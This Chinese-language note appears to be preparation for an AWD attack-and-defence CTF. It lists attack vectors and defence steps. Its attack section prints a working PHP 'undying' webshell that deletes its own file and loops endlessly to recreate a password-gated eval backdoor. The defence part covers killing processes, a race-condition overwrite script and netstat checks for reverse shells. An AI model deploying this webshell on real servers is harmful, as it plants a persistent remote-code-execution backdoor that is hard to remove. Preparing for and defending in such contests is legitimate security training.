AWD准备

Attack

漏洞利用

文件上传
任意文件读取

webshell上传

不死马确实好用

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '3.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

如果通过参数 也可以读，写入文件函数如下：

file_put_contents("test.txt", "This is another something.", FILE_APPEND);

Defence

改密码

SSH

passwd username

应用后台
数据库

##监控脚本
新增文件监控并删除
Get/Post记录
WAF（慎用 如果导致check失败会扣分）

##中了不死马怎么办
杀死进程，但估计会导致服务down
```shell
ps auxww|grep shell.php 找到pid后杀掉进程就可以
kill -9 -1 //杀死全部的进程
ps aux | grep www-data | awk '{print $2}' | xargs kill -9//最好的解决方案是kill掉www-data用户的所有子进程

利用条件竞争生成与不死马相同的文件，测试了一下，不断刷新还是可以执行命令

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.3.php';
    $code = 'hi springbird !';
    //pass=pass
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .3.php');
    //    usleep(5000);这个时间比不死马短，利用条件竞争
          usleep(1000);
    }
?>

查找反弹shell

使用命令

netstat -antp

可以看到本机和同网段下主机已经建立连接 杀掉进程

kill -9 -pid
![](https://img2020.cnblogs.com/blog/1272123/202012/1272123-20201208091116243-975778323.png)